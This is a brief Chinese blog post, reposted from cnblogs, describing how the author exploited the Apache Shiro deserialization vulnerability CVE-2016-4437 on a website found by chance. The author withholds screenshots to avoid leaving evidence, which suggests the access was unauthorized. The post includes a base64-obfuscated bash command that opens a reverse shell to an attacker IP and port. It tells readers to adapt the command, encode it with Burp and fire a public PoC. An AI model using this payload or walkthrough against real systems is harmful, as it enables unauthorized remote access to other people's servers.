shiro反序列化(CVE-2016-4437)

脚本自行git查找。

偶然发现之前的一个网站,抓包发现cookie中存在remember=deleteme(这里就不截图了,防止留下证据)

手痒难耐,就试试4437这个洞,首先打开你的shiro脚本,使用一条命令

得到回显

 咦,是不是可以直接动手,菜鸟不考虑利用链,直接就使用poc来打就是了

大佬勿喷,隐藏地方为网站:端口号,bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc3LjE0OS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}',这里的命令为网上大佬的命令,自行修改,不要做伸手党哦。编码可以使用burp。

直接回车,简简单单弹回shell

 弹回shell。

勿做伸手党,勤思考,总能成就一番事业。
原文地址:https://www.cnblogs.com/X-caiji/p/13215124.html